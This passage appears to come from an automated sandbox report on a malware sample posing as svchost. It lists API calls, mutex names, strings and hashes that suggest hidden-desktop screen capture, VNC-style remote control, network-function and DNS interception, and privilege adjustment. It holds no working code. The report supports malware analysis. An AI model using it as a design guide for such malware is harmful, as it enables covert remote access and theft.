                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,74DEF590,74DE16B0,?), ref: 02C9902F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02C99037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C99048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02C99059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C99070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C990B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C990C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C990C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02C990CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C99129
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C99142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C9915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02C99194
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,74DEF550,74DEDF10,02CA598B), ref: 02CA9831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02CA9843
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA578
                                                                                                                                                                                                                • Part of subcall function 02CAA540: memcpy.MSVCRT ref: 02CAA5A0
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualProtect.KERNEL32(00000000,?,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA635
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualProtect.KERNEL32(?,00000000,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02CA9862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 02CA9870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02CA988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02CA98A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 02CA98C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB31EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB31FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB3211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3080,00000000,00000000,00000000), ref: 02CB3234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02CB3245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB19CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB19D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB19ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB19FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB17D0,00000000,00000000,00000000), ref: 02CB1A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB1A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4220), ref: 02CB1A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4220,KBP), ref: 02CB1A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB1A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$a23c4220
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9EB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C9F9DF,?,?), ref: 02C9EBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C9F9DF,?,?), ref: 02C9EC91
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EDD3
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EE8E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EE9F
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C9A70E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C99523,00008001,?), ref: 02C9A737
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9A73E
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9A752
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C9A7C1
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C99523,00008001,?), ref: 02C9A7DA
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9A86B
                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 02C9A882
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C9A8C9
                                                                                                                                                                                                              • GetWindowInfo.USER32 ref: 02C9A941
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetWindowRect.USER32(?,?), ref: 02C99FF7
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: IsRectEmpty.USER32(?), ref: 02C9A066
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetWindowLongA.USER32(?,000000F0), ref: 02C9A076
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: GetParent.USER32(?), ref: 02C9A08A
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: MapWindowPoints.USER32(00000000,00000000,?,02C9A6F4), ref: 02C9A093
                                                                                                                                                                                                                • Part of subcall function 02C99FD0: SetWindowPos.USER32(?,00000000,?,02C9A6F4,00000000,00008001,0000630C,?,02C9A6F4,00000000,00008001,?), ref: 02C9A0B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 02CA92D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA9338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 02CA9392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA93AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA93B3
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA93C3
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA93CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 02CA9414
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID: GET $POST
                                                                                                                                                                                                              • API String ID: 1455188016-2494278042
                                                                                                                                                                                                              • Opcode ID: 38ad5f49bd870b5f530048a891d7580d5971e6b7a58c35b7f59b213d1dee8298
                                                                                                                                                                                                              • Instruction ID: 516ec7f74bd4f2ee920022c4d996c59505569d4d3a6032a0a3758e914eb8dc91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38ad5f49bd870b5f530048a891d7580d5971e6b7a58c35b7f59b213d1dee8298
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3414FB1D41219AFDB10DFA8D885BEEBBF9EF48704F508529E504E7240E734AA01CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA0437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,02CA092A,00000000,?), ref: 02CA0448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA0458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA0468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02CA092A,00000000,?), ref: 02CA047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02CA092A,00000000,?), ref: 02CA048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02CA092A,00000000,?), ref: 02CA048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              • Opcode ID: 2a1f5e0a088a95fc51f456bc0ec3f9bff51bbbee0487f8aad0cd10bfef467254
                                                                                                                                                                                                              • Instruction ID: 175426a7c06529c18d850f0d423d810da663affba45bed98ab32e212e51ceaef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a1f5e0a088a95fc51f456bc0ec3f9bff51bbbee0487f8aad0cd10bfef467254
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9631A131A42222ABDB24AF71A868F5B7B9CFF857A9F44C516ED09DB240D770D510CAA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C96350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02C9635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02C9636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C96383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C9639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C963BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C963D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 2466897691-3547598143
                                                                                                                                                                                                              • Opcode ID: db26cb5cb35ce5766911155c754733ad28ffb8c3e510df2d4088ec0a8feed190
                                                                                                                                                                                                              • Instruction ID: c6d269e4d38391c7b98241be1521bfde6c7c1e808387195b3d81ab3d9f90207e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db26cb5cb35ce5766911155c754733ad28ffb8c3e510df2d4088ec0a8feed190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97016D717C1B1637BD1132761D0EF6F125E6F80EC97A50530B617F60C4DBA5E20194B9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB19CC
